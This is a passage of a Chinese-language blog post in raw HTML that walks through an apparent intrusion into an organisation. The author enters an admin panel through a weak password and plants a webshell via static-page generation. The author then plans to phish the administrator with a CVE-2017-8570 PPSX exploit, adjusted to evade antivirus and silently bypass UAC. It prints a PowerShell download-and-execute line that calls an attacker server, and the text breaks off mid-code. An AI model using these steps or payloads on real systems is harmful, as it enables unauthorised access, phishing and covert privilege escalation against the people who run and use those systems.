font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">通过弱口令轻松进入到后台，发现一个可以生成静态站的地方：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7f4wj7mqj21570kqaiw.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">把自定义静态页面存储主路径改成&nbsp;1.asp&nbsp;，然后编辑一篇文章把木马代码放进去，重新生成静态页面&nbsp;GetShell&nbsp;：</p><p><span style="letter-spacing: 1px;"></span></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><br/><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7f5n30scj215l0oethk.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">这个服务器的&nbsp;82&nbsp;不能执行cmd，不支持aspx，不能跨目录到umail，但是在一个奇怪的地方发现一个一份企业通讯录，下载下来看到管理员邮箱：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7f63g1m4j20is02agm8.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">于是想到用伪造邮件的方法来钓管理员，参考两篇文章：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">第一种方法：首先用&nbsp;CVE-2017-8570&nbsp;Explot&nbsp;做一个钓鱼用的&nbsp;ppsx&nbsp;，由于原来的&nbsp;exp&nbsp;要用&nbsp;Poershell&nbsp;下载&nbsp;shell.exe&nbsp;再执行，这样容易被杀软发现，并且原来的&nbsp;exp&nbsp;执行反弹回来的&nbsp;shell&nbsp;权限不够，所以要考虑绕过&nbsp;UAC&nbsp;，让管理员点击恶意的&nbsp;ppsx&nbsp;后静默反弹一个高权限的shell&nbsp;，如果用&nbsp;nishang&nbsp;给的&nbsp;Invoke-PsUACme.ps1&nbsp;，执行之后会有一个一闪而过的黑框框，很让人感到怀疑，去掉这个一闪而过的黑框框很简单，因为我用&nbsp;oobe&nbsp;的方法在&nbsp;Win7&nbsp;上绕过&nbsp;UAC&nbsp;，所以我在这里只介绍在这种条件下去掉黑框框的方法，首先去掉&nbsp;<code style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">Invoke-PsUACme.ps1</code>&nbsp;第206行的&nbsp;<code style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">&&nbsp;$execpath</code>&nbsp;代码，之后在调用&nbsp;Invoke-PsUACme&nbsp;的时候&nbsp;<code style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">-payload</code>&nbsp;参数写上你要执行的命令，最后用&nbsp;rundll32.exe&nbsp;静默启动&nbsp;<code style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">C:/Windows/System32/oobe/setupsqm.exe</code></p><div id="crayon-5c25a60d4f7ae281730003" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 600.8px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f7ae281730003-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;<span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">IEX</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-r" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">New</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">Object</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Net</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">WebClient</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">DownloadString</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">"http://10.101.101.16/uacchm.ps1"</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">换掉原来&nbsp;exp&nbsp;里面的&nbsp;Powershell&nbsp;调用语句，其中&nbsp;uacchm.ps1&nbsp;的内容是：</p><div id="crayon-5c25a60d4f7b3447538344" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">2</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">3</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">4</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">5</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 2020px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f7b3447538344-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: 